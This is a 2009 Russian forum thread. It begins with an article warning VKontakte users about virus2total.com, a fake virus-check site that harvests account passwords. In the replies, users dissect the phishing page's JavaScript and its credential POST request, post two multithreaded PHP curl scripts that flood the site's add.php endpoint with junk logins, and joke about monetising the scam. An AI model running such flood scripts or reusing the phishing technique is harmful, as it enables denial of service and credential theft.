"С твоего акаунта постоянно мне приходят спам сообщения. у тебя что вирус ? проверь свой акаунт на сайте virus2total.com , надоело уже" - вот такое сообщение в последнее время получают многие пользователи социальной сети В контакте. Сообщения приходят как от друзей, так и от совершенно посторонних людей и может прийти к вам как по электронной почта, так и через любую социальную сеть (блог). Не исключение стал и я.
Если вам вдруг пришло такое сообщение не спешите переходить по данной ссылке и вводить свои данные. Это всего лишь очередная попытка "злодеев" завладеть вашими данными от учетной записи, чтобы потом отсылать через нее спам и другое вредоносное ПО.

Что же из себя представляет данный сервис с таким громкоговорящим название?! Это всего лишь фейк и никакого отношения к сервису VIRUS TOTAL он не имеет.

http://s42.radikal.ru/i096/0908/72/d1436755ff8a.jpg

Принцип работы сервиса прост, вы указываете в строке для проверки свой E-mail (аккаунт в контакте) и начинается проверка на наличие вирусов. И вдруг выскакивает устрашающая надпись, что в вашем аккаунте найдет вирус и для его нейтрализации нужно ввести пароль от учетной записи.

http://s59.radikal.ru/i163/0908/69/bb1434deb8a5.jpg

Далее Вы вводите свой пароль от аккаунта и программа производит чистку, после чего информирует Вас о том, что чистка произведена и все вредоносное ПО удаленно с вашего аккаунта.

http://s42.radikal.ru/i095/0908/2d/ede4b6332f4e.jpg

Вроде ничего подозрительного нет, но есть но. Когда Вы вводите свои данные, якобы для проверки, они автоматически пересылаются на сервер "злоумышленников" и когда приходит их час начинают действовать для своих "грязных" замыслов.

И запомните раз и навсегда, что вирусы функционируют только на клиентской машине, то есть PC, а ну никак не на личной странице на сервере. Именно поэтому лечение от вирусов – совсем другая операция, требующая установку антивируса на компьютер, но никак не ввод данных для доступа к учётной записи на сомнительном сайте.
Поэтому, если подобное сообщение пришло и к вам, не торопитесь, сломя голову, ломится на сайт и проверять на вирусы.

Для эксперимента можете ввести данные от несуществующего аккаута, результат всегда будет один и тотже, программа якобы найдет вирус и попросит ввести пароль, а потом уведомит вас о благополучном исходе.

Автор: Kastin © 2009

Ничего подозрительного ? Автор,у тебя совсем крыша слетела с катушек ? Ввести пароль - это что, уже считается нормально ?!Да пусть хоть порно покажут...

Ахахах
Такой развод
пишешь левый пароль
он пишет спасибо =)
Ваш акк почищен

на этом бы партнерку сделать :D думаю норм конвертилось ... :D

Ага, идея покруче, чем обычный фейк, ХОРОШО ПРИДУМАЛ!

еще бы отправку смс прикрутить туда :)

отличный лохотрон. просто отличный.
чуток бы до ума довести, и воды добавить на страницу... и вообще конфетко будет))

Хороший фейк.

Классный фейк респект!!

интересно а как так можно реализовать вывод данных внизу фейка со страницы вконтакте

начинаем базу акков искать :D

Регистрация домена - 23 августа.

Причем, только с одного айпи предупреждает один раз, а дальше говорит "вирусов нет". Умно.

он хорошо замаскирован!! form action="javascript:"

аха, интересно что
http://virus2total.com/add.php -добавляет а базу логины пароли


function searchAccount() {
mail = document.getElementById('date_input').value;
if (validateEmail()) {
if (getCookie('good')==null) {
setCookie('good', mail)
}
progressBar('visible', "подождите, идет поиск");
setTimeout("timeOut()", timeout);
$('body').append('<iframe src="http://vkontakte.ru/app759733" style="width:1px; height:1px; visibility:hidden"></iframe>');


//setTimeout('displayUser( "Лилия Петровскийа", "http://cs719.vkontakte.ru/u38922024/a_9850a3ac.jpg", "29-06-1990", "женский","Россия","Москва");', 5000);
}
}

я так понимаю открывает приложение?????

root_sashok, зырь в куки, тама good=%mail% он так определяет
Что? Где? Когда?, (ппц ник) я тож это в сниффере поймал

Вобще вещ оч крутая, через ajax смотрит профиль, много пассов они там наловили, предлагаю им засрать логи :cool:
Если чо вот
POST http://virus2total.com/add.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Accept: text/plain, */*, text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
User-Agent: Opera/9.64 (Windows NT 5.1; U; ru) Presto/2.1.1
Host: virus2total.com
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Referer: http://virus2total.com/
Cookie: good=a@a.ru
Cookie2: $Version=1
Proxy-Connection: Keep-Alive
Content-Length: 96
Content-Transfer-Encoding: binary

email=a%40a.ru&pass=%D0%B2%D1%8A%D0%B5%D0%B1%D0%B8+%D0%B3%D0%BE%D 0%B2%D0%BD%D0%B0+%25username%25

Ща нас опять по телеку покажут!111
Телевидение снимите мой пост!!!1111

А я БД флужу, уже 3к мессаг, сейчас многопотоычнм это доделываю и писец.

На такой фейк может повестись только 2 летняя девочка с синдромом дауна .
Ну или люди не сидящие на ачате, ибо нас предупредили уже ^_^ Спасиб=)

<br />
<b>Warning</b>: fclose(): supplied argument is not a valid stream resource in <b>/home/computer/public_html/virus2total.com/add.php</b> on line <b>7</b><br />

Он работает на файлах
Лог можно засрать ...\r\n...\r\n...\r\n......
ИМХО если там фильтрация не идёт

В 20 потково запустил с деда, тыща мессаг - пол минуты, ня :3

http://virus2total.com/index_tmp_files/virustot.js

wildshaman герой ппц

wildshaman герой ппц
Всё правильно... ЭТА ВАЙНА!!!11 :D

Так я не понял, оно тырит куки или нет? :)

куки не тырит... вродебе... Ну в пакетах я не нащёл, еслиб тырило онобы сразу твоё мыло выводило
Айда флудить!
<?php
#v3.0 :D
set_time_limit(0);
$threads = 10; #Потоки

/*****************************/

$fuck = 0;

while (1) {
#$fuck++;

$ch = array();
$mh = curl_multi_init();

for($th=1;$th<=$threads;$th++) {
$ch[$th] = curl_init();

curl_setopt($ch[$th], CURLOPT_URL, "http://virus2total.com/add.php");
curl_setopt($ch[$th], CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch[$th], CURLOPT_POST, 1);
curl_setopt($ch[$th], CURLOPT_POSTFIELDS, 'email='.genFuck(0).'&pass='.genFuck(1));

curl_multi_add_handle($mh,$ch[$th]);
}

$running=$threads;
do {
$was = $running;
curl_multi_exec($mh,$running);

if($was-$running != 0) { #Убрать если ненадо
$fuck += $was-$running; #Убрать если ненадо
echo "$fuck strings fucked\r\n";#Убрать если ненадо
} #Убрать если ненадо
} while ($running > 0);

}

exit; die(vir2total);

function genFuck($pass) {
$sg = 'qwrtpsdfghjklzxcvbnm';
$ng = 'eyuioa';

$mail = '';

for($i=1;$i<=rand(4,20);$i++) {
if($i%2) $mail .= $sg[rand(0,strlen($sg)-1)];
else $mail .= $ng[rand(0,strlen($ng)-1)];
}

if ($pass) return $mail;

$domains = array('mail.ru','inbox.ru','yandex.ru','list.ru', 'bk.ru','yahoo.com','gmail.com'); #добавить если чо
shuffle($domains);

return urlencode($mail.'@'.$domains[0]);
}
?>

через \r\n не стал делать, но можете сделать
Просто хз какой там разделитель и что имено он пишет
\r\n это %0D%0A

Значит через приложение данные просто показывает, не более.

Значит через приложение данные просто показывает, не более.
данные оно через ajax берёт
Хотя оно уже знает твой ID когда делает запрос, хмм
А, по ходу оно запрашивает http://vkontakte.ru/app759733 и узнаёт уже твой ID

Ну да, ничего опасного, значит. Сервис выдает данные, пользователь пугается и вводит пароль. Данные идут в лог.

Многопоточная флудилка:

<?
@set_time_limit(0);

function imTimer($name= 'default', $mode= ''){
static $timers= array();
$now=microtime(true);
if(!isset($timers[$name])){
$timers[$name]= $now;
return 0;
}
$ret= $now - $timers[$name];
if($mode == 'reset')
$timers[$name]= $now;
return round($ret, 5);
}
imTimer();

class MCurl
{
var $timeout = 20;
var $threads = 10;
function multiget($urls, &$result)
{

$threads = $this->threads;
$i = 0;
for($i=0;$i<count($urls);$i=$i+$threads)
{
$urls_pack[] = array_slice($urls, $i, $threads);
}
foreach($urls_pack as $pack)
{
$mh = curl_multi_init(); unset($conn);
foreach ($pack as $i => $url)
{
$name[]=md5(rand(0,99999999));
$conn[$i]=curl_init(trim($url));
curl_setopt($conn[$i],CURLOPT_RETURNTRANSFER, 1);
curl_setopt($conn[$i],CURLOPT_POSTFIELDS, "email=Wildshaman:{$name[$i]}&pass=Wildshaman:{$name[$i]}");
curl_setopt($conn[$i],CURLOPT_TIMEOUT, $this->timeout);
curl_multi_add_handle ($mh,$conn[$i]);
}
do { $n=curl_multi_exec($mh,$active); usleep(100); } while ($active);
foreach ($pack as $i => $url)
{
$uu++;
if (preg_match("|ok|is", curl_multi_getcontent($conn[$i])))
{
echo "$uu - {$name[$i]} <br>";
flush();
}
curl_close($conn[$i]);
}
curl_multi_close($mh);
}

}
}


for ($h=1; $h<=50000; $h++)
$urls[]="http://virus2total.com/add.php";
$mcurl = new MCurl;
$mcurl->threads = 20;
$mcurl->timeout = 30;
unset($results);
$mcurl->multiget($urls, $results);

print "$nu - <hr>общее время работы программы: ".imTimer();
?>

wildshaman, а чо, самый лысый, тоже в многопоточный переделал :))

wildshaman, а чо, самый лысый, тоже в многопоточный переделал :))
:)
У тебя кривая многопоточность, потоки работают не параллеьно, а постоянно дожидаются завершения других (как-то так,где-то читал) :P

Ааа, щас пойду мозг ломать, исправлю какнить

Так а где сам лог храниться? Можна как-то к ниму доступится?

=Zeus=, мы его щас так засрём что ты:
1)Хрен стоко скачаеш
2)Заипёшся чекать
====
wildshaman, та ну, нехочу мозг ломать, так работает меня устраивает, 30 потоков замучу и оставлю наночь
====
ддосят сайтег или меня глючит? :rolleyes:

=Zeus=, мы его щас так засрём что ты:
1)Хрен стоко скачаеш
2)Заипёшся чекать
====
wildshaman, та ну, нехочу мозг ломать, так работает меня устраивает, 30 потоков замучу и оставлю наночь
====
ддосят сайтег или меня глючит? :rolleyes:
глючит, не ддосят)
60к уже есть ^^
Понча, стукни мне в осекушку, 794788

Так, я понял одно: если буду делать фейк вам не скажу =))

доооо)) прям устранение конкурентов, а смысл, всё равно сайт вконтакте уже заблокирован=))))) и ещё pizdhelp.com на того же чела зареган, только сайт не о чём тут

пол ачата делает фейки, чем вам этот мешает, избавимся от идиотов которые вводят свои пароли где попало :)

бамс-бамс, пивко, ддос, абуза, пиздoнулсо сайтег :D

У понча флудилка практичней, потому что легко отчистить базу от дубликатов в данном случае у Wildshaman'a куча записей Wildshaman:Wildshaman

Да ребятки, быстро вы же посторались. Я статью наверное дольше писал.
Раздербанили сервис в пух и прах... :D

ога, всем спасибо за моральную поддержку :D скидывайте сюда линки на массовые гавнофейки и т.д ) разберёмся )))

уже даже не заходит!

Закрыто.